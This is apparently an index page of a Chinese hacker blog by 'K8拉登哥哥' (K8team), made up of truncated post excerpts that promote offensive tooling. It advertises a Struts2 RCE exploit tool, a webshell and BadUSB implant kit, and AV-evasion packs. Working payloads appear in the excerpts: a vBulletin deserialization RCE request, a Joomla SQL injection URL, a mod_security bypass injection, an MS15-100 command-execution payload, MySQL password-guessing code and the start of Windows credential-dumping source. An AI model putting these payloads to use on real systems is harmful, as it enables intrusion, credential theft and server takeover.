显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 
 

免责声明

 
 
模块内容加载中...
 
 
 
 
 

常去站点

 
 
模块内容加载中...
 
 
 
 
 
 
 

[置顶] [原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)

2014-7-31 10:27:59 阅读154076 评论46 312014/07 July31

工具: K8 Struts2 Exploit
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2014/7/31 10:24:56

简介:

K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)
Struts2漏洞检测工具   Struts2漏洞测试工具  K8 struts2 exploit Test  Struts2 GetShell

作者  | 2014-7-31 10:27:59 | 阅读(154076) |评论(46) | 阅读全文>>

K8飞刀  by K8拉登哥哥@[K8搞基大队]
博客: http://qqhack8.blog.163.com

简介: K8飞刀是一款多功能的安全测试工具. Hacker Swiss Army Knife.

      含大量漏洞EXP/GetShell/0day网马/U盘种马BadUSB/脱库采集工具
      支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描
      黑客浏览器/自动检测注入/自动收集信息/Exp调式/可一键生成EXP
      多种编码转换/一键CSRF构造/Cookie一键登陆/XSS编码/SQL提权等

作者  | 2015-9-13 19:00:05 | 阅读(86472) |评论(27) | 阅读全文>>

[置顶] K8搞基工具包2013(编程开发/破解免杀/渗透提权)

2013-5-2 1:23:08 阅读51872 评论28 22013/05 May2

程序: K8搞基工具包2013
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013/5/2 1:21:02

简介: K8搞基工具包2013(包含编程开发/破解免杀/渗透提权/等等综合工具包)

不多说上图片
 K8哥哥 s Blog
 
 K8哥哥 s Blog
 

作者  | 2013-5-2 1:23:08 | 阅读(51872) |评论(28) | 阅读全文>>

工具: ms15022_exploit
编译: VS2012  C# (.NET Framework v2.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2015/7/31 17:12:49

简介:
漏洞编号:CVE-2015-0097 MS15-022
影响版本:office 2007 && office 2010 && office 2013
https://support.microsoft.com/zh-cn/kb/3038999

作者  | 2015-7-31 17:16:24 | 阅读(30276) |评论(7) | 阅读全文>>

[原创]K8飞刀20151120 webshell支持列大目录以及目录信息保存

2015-12-14 23:13:50 阅读3306 评论0 142015/12 Dec14

K8飞刀  by K8拉登哥哥@[K8搞基大队]

博客: http://qqhack8.blog.163.com

简介: K8飞刀是一款多功能的渗透测试工具.

      内置大量漏洞EXP/GetShell/0day网马/BadUSB种马/脱库采集工具
      支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描
      黑客浏览器/自动检测注入/自动收集信息/Exp调式/可一键生成EXP
      多种编码转换/一键CSRF构造/Cookie一键登陆/XSS编码/SQL提权等

作者  | 2015-12-14 23:13:50 | 阅读(3306) |评论(0) | 阅读全文>>

[EXP]vBulletin 5.1.4-5.1.9 远程任意代码执行漏洞

2015-11-23 17:49:48 阅读2947 评论0 232015/11 Nov23

漏洞概要

vBulletin 是一个论坛程序套件,它使用PHP编写。该漏洞利用decodeArguments Ajax API执行php代码,可直接代码获取服务器权限。

vBulletin (5.1.4<=version<= 5.1.9)

www.vbulletinindir.com/download/vBulletin-5.1.4.rar

POC
108.47.xx.yy – – [02/Nov/2015:22:18:21 -0500] “GET /vbforum[/]ajax/api/hook/decodeArguments?
arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00
db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22

作者  | 2015-11-23 17:49:48 | 阅读(2947) |评论(0) | 阅读全文>>

[EXP]joomla 3.2-3.4.4 SQL注入漏洞

2015-10-23 17:51:41 阅读4086 评论0 232015/10 Oct23

[EXP]joomla 3.2-3.4.4 SQL注入漏洞EXP

FILE: /administrator /components /com_contenthistory/ models/history.php is vulnerable to SQL injection:

EXP
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1 &list[select]=

作者  | 2015-10-23 17:51:41 | 阅读(4086) |评论(0) | 阅读全文>>

PHP连接MYSQL

2015-9-29 15:39:22 阅读2316 评论1 292015/09 Sept29

<?

$ip="192.168.85.182";

connect($ip,"root", "k8team");

function connect($ip,$user, $pass) {
    if(@mysql_connect($ip, $user, $pass)){
        echo "<font color='#0000FF'><b>Password: <font color='#FF0000'>".$ip.'---'.$pass."</font></b></font>";
        exit();

作者  | 2015-9-29 15:39:22 | 阅读(2316) |评论(1) | 阅读全文>>

[扯淡]苹果安全神话"破灭" Xcode后门事件受害用户过亿

2015-9-19 0:53:03 阅读1351 评论0 192015/09 Sept19

国人又坑国人...使用非官方的IDE帮助"作者"传播后门
再次提醒大家使用工具 一定要去官方下载 否则后果自负

http://drops.wooyun.org/news/8864
http://init.icloud-analysis.com
 
[扯淡]苹果安全神话破灭 Xcode后门事件受害用户过亿 - K8拉登哥哥 - K8拉登哥哥s Blog

作者  | 2015-9-19 0:53:03 | 阅读(1351) |评论(0) | 阅读全文>>

[源码]一键获取windows系统登陆密码vc6版源码

2015-9-16 11:03:32 阅读5199 评论0 162015/09 Sept16


[源码]一键获取windows系统登陆密码vc6版源码
支持:XP/2000/2003/WIN7/2008等

此版本编译出来的程序体积较小几十KB...
而vs版则1点几M,体积整整大了2-30倍
对某些奇葩环境...1点几M可能要分几十次传过去

总是在关键的时候,发现自己以前弄过的东西突然不见了
然后百度好不容易找到了一份..还是发到博客来 收藏
需要修改输出TXT的或免杀啥的...上自己博客找源码

[源码]一键获取windows系统登陆密码vc6版源码 - K8拉登哥哥 - K8拉登哥哥s Blog

#include <windows.h>
#include <stdio.h>

//
//  Vsbat[0x710dddd]
//  

作者  | 2015-9-16 11:03:32 | 阅读(5199) |评论(0) | 阅读全文>>

[0day]MS15-100 微软Media播放器命令执行漏洞

2015-9-14 17:50:04 阅读2743 评论0 142015/09 Sept14

poc: https://www.exploit-db.com/exploits/38151/

<application run="calc.exe"/> 骄情的老外 就这么一句 还非用这python来装B

[0day]MS15-100 微软Media播放器命令执行漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog
 
可以使用 UNC路径  但对方点击时 会提示 是否给运行
<application run="\\192.168.85.143\Share\calc.exe"/> 

作者  | 2015-9-14 17:50:04 | 阅读(2743) |评论(0) | 阅读全文>>

[注入]PHP bypass mod_security SQL

2015-9-13 13:13:12 阅读1707 评论0 132015/09 Sept13


国外X论坛看到的 不翻译了 也看不懂ru 不会翻译 
大家看注入语句就OK了 只要测试能绕过就好东西

Комментарии + перевод каретки %0D%0A
Код:

http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

url-decode вариант:
Код:

http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union#foo*/*bar
select#foo

作者  | 2015-9-13 13:13:12 | 阅读(1707) |评论(0) | 阅读全文>>

[XSS]flash与js通信

2015-9-13 12:54:20 阅读603 评论0 132015/09 Sept13


在flash里执行js
ExternalInterface.call("eval", "sayHello('k8team')");

调用flash的页面

<script language="javascript">    
function sayHello(name) {
  alert("hello, " + name);
}
</script>

作者  | 2015-9-13 12:54:20 | 阅读(603) |评论(0) | 阅读全文>>

[XSS]收集几个在线JS加密地址

2015-9-13 12:50:22 阅读1004 评论0 132015/09 Sept13


1、
http://www.jsobfuscate.com/index.php

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1

2、
http://www.gaijin.at/en/olsjse.php

var a="fmawoglv,upkvg'0:'00'1Akdpcog'02qpa'1Fjvvr'1C--crhal,ljpk,mpe,vu-qgptgp-crhal-Lgqvng

作者  | 2015-9-13 12:50:22 | 阅读(1004) |评论(0) | 阅读全文>>

[XSS]JS探测内网IP 真实IP

2015-9-13 12:46:42 阅读1868 评论0 132015/09 Sept13

JS探测内网IP 20150831测试可用
https://diafygi.github.io/webrtc-ips/

挂VPN后上面探测不到任何IP 此站可以
https://ipleak.net  2015.9.2

WebRTC漏洞可泄露VPN用户真实IP 部分版本(K8实战还未得知哪个版本可探测真实IP)

在去年的Google I/O 大会上,Google表示WebRTC将支持超过十亿个不同端点(桌面浏览器和移动设备端),
也就是说WebRTC将应用Chrome浏览器和Android移动操作系统。

Firefox 41 disables the default (unreliable) STUN server https://wiki…

作者  | 2015-9-13 12:46:42 | 阅读(1868) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
日志评论
评论列表加载中...
 
 
 
 
 
 
 
 

 未设置 天秤座

 发消息  写留言

 
K8搞基大队队长 专注于被妞泡
 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

热门日志

 
 
数据列表加载中...
 
 
 
 
 

归档

 
 
数据加载中...
 
 
 
 
 

日志分类

 
 
日志分类列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018

注册 登录  
 加关注